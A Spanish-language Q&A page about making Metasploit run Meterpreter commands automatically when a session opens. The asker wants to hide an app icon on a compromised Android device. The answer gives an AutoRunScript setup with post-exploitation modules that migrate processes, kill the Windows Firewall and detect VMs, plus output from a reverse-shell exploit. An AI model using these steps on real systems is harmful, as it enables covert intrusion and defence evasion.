Ejecutar automáticamente los comandos de meterpreter en el inicio de sesión

Question

Ejecutar automáticamente los comandos de meterpreter en el inicio de sesión

#1 de OscarAkaElvis (3 votos)

4

¿Hay una manera de ejecutar uno o varios comandos de meterpreter automáticamente, tan pronto como el oyente obtiene una conexión (es decir, la sesión se establece con un objetivo)? Quiero ejecutar el comando 'hide_app_icon' tan pronto como se obtenga una sesión. ¿Alguna idea?

PS: el objetivo es un dispositivo Android y la escucha se está ejecutando en un VPS debian.

metasploit meterpreter

pregunta wishchaser 03.03.2017 - 17:36

fuente

1 respuesta

Lea otras preguntas en las etiquetas metasploit meterpreter

¿La comprobación de una huella digital precompartida de un certificado es lo suficientemente buena para TLS? ¿Cuáles son los pasos adecuados para “poner en cuarentena” el malware?

score 3 · Accepted Answer

¡Claro que sí! puede definir un archivo con comandos (archivo .rc) y establecer ese archivo como autoejecutable.

msf > set AutoRunScript multi_console_command -rc /root/autoruncommands.rc

Coloque dentro del archivo .rc los comandos que desea iniciar:

run post/windows/manage/migrate
run post/windows/manage/killfw
run post/windows/gather/checkvm

Luego, después de crear una sesión, se ejecutarán automáticamente:

msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 10.10.200.40:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 10.10.101.11
[*] Meterpreter session 6 opened (10.10.200.40:4444 -> 10.10.101.11:1125) at 2012-04-22 17:58:16 -0400

meterpreter > 
[*] Session ID 6 (10.10.200.40:4444 -> 10.10.101.11:1125) processing AutoRunScript 'multi_console_command -rc /root/autoruncommands.rc'
[*] Running Command List ...
[*]     Running command run post/windows/manage/migrate
[*] Running module against XPVM-SP2
[*] Current server process: svchost.exe (1324)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3984
[+] Successfully migrated to process 3984
[*]     Running command run post/windows/manage/killfw
[+] Killing Windows Firewall...
[+] Done!
[*]     Running command run post/windows/gather/checkvm
[*] Checking if XPVM-SP2 is a Virtual Machine .....
[*] This is a VMware Virtual Machine

Extraído de aquí . Copié y pegué el mismo ejemplo porque es suficiente para explicarlo. Y revisa el enlace, tiene más cosas interesantes.